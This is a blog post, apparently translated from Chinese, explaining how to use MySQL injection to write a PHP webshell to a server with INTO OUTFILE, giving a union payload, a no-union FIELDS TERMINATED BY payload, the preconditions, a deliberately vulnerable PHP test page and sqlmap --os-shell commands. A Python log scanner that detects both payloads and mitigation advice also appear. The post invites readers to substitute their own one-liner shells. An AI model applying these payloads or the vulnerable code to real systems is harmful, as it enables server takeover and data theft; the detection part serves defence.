
MySQL injection: two ways of writing a one-line shell to quickly get a webshell

News · lee_avison1960 · 91℃ · 0 comments

Exploitation requires all of the following conditions:

  1. root privileges on the database
  2. GPC off (magic_quotes_gpc disabled, so single quotes can be used)
  3. A known absolute path (not needed for reading files, but required for writing them)
  4. --secure-file-priv not configured

1. union

    id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php'%23

<? phpinfo(); ?> is the content that gets written; replace it with your own one-liner. /home/wwwroot/5ime.cn/luan_phpinfo.php is the file to create inside an existing directory of the site, i.e. the name of the file being written.

2. no union

    id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' fields terminated by '<? phpinfo(); ?>'%23

I first saw the second method in a 吐司 post dated 2015-1-24; 吐司 really does have a lot of experts.
The result looks like this:
(screenshot)


The second method gets a shell by injecting the field separator, so the query result must have more than one column;
injection points usually satisfy this condition.

Using sqlmap

Taking luan_test.php as an example:

    <?php
    @$link= mysql_connect("localhost","root","");
    mysql_select_db("mysql",$link);
    $user = strtolower($_GET['user']);
    // crude blacklist: only the keyword "union" is rejected
    if(strpos($user,"union") === false){
    $sql= "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysql_query($sql);
    echo mysql_errno() . ": " . mysql_error(). " ";
    }
    ?>
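The test script above only blacklists the word "union", which is exactly what the second payload shape avoids. As an added example (not code from the original post), the following Python scanner flags both payload shapes in web-server access logs regardless of whether "union" appears, after undoing URL encoding, double encoding and /**/ comment padding; the log lines are constructed, and the INTO DUMPFILE case goes beyond the post to cover MySQL's sibling file-writing clause.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post). Lines 2 and 3 mirror the
# union and no-union INTO OUTFILE payloads above; line 4 is a double-encoded INTO DUMPFILE
# variant; line 5 is a benign request that merely contains similar words.
SAMPLE_ACCESS_LOG = """\
192.168.2.10 - - [24/Jan/2015:10:00:01 +0800] "GET /luan_test.php?user=root HTTP/1.1" 200 512
192.168.2.10 - - [24/Jan/2015:10:00:02 +0800] "GET /luan_test.php?user=root%27)+union+select+1,2,3,4,5,6,7,%27%3C%3F+phpinfo();+%3F%3E%27+into+outfile+%27/home/wwwroot/lu4n.com/luan_phpinfo.php%27%23 HTTP/1.1" 200 600
192.168.2.10 - - [24/Jan/2015:10:00:03 +0800] "GET /luan_test.php?user=root%27)+into+outfile+%27/home/wwwroot/lu4n.com/luan_phpinfo.php%27+fields+terminated+by+%27%3C%3F+phpinfo();+%3F%3E%27%23 HTTP/1.1" 200 600
192.168.2.10 - - [24/Jan/2015:10:00:04 +0800] "GET /luan_test.php?user=root%2527%2520INTO%2520DUMPFILE%2520%2527/var/www/a.php%2527%2523 HTTP/1.1" 200 600
192.168.2.10 - - [24/Jan/2015:10:00:05 +0800] "GET /docs/mysql/select-into-outfile.html HTTP/1.1" 200 9000
"""

FILE_WRITE = re.compile(r"\binto\s+(?:outfile|dumpfile)\b", re.I)
TERMINATOR = re.compile(r"\b(?:fields|lines)\s+terminated\s+by\b", re.I)
UNION = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
TARGET = re.compile(r"\binto\s+(?:outfile|dumpfile)\s*['\"]([^'\"]+)", re.I)
PHP_TAG = re.compile(r"<\?")
REQ_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def normalize(url):
    """Decode twice (catches %25 double encoding and '+' spaces), drop /**/ comments, squeeze blanks."""
    s = unquote_plus(unquote_plus(url))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)

def classify(url):
    """Return None for a clean request, otherwise which file-writing payload shape it carries."""
    q = normalize(url)
    if not FILE_WRITE.search(q):
        return None
    variant = "union" if UNION.search(q) else "no-union" if TERMINATOR.search(q) else "other"
    target = TARGET.search(q)
    return {"variant": variant, "target": target.group(1) if target else None,
            "php_tag": bool(PHP_TAG.search(q))}

def scan_access_log(text):
    """Return (line number, classification) for every request that writes a file via SQL."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_LINE.search(line)
        c = classify(m.group(1)) if m else None
        if c:
            hits.append((lineno, c))
    return hits

if __name__ == "__main__":
    for lineno, c in scan_access_log(SAMPLE_ACCESS_LOG):
        print(lineno, c)
```

A hit whose target lies under the web root and carries a "<?" tag is the case the post describes; pairing it with a check that secure_file_priv is set and that the application account lacks the FILE privilege closes the conditions listed at the top.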

Tested: the latest version of sqlmap does in fact support this method:

    C:/luan/sqlmap>python sqlmap.py -u "http://192.168.2.200/luan_test.php?user=root" --os-shell

(screenshots)

But if --os-shell cannot be used, sqlmap does have a file-write option; in my testing it did not succeed....
(screenshot)

In other words, sqlmap can only upload its own webshell.
(screenshot)

If tool users run into this situation, simply use sqlmap --os-shell and then work through the webshell that sqlmap uploads.

Please credit when reprinting: 逗比根据地 » MySQL injection: two ways of writing a one-line shell to quickly get a webshell
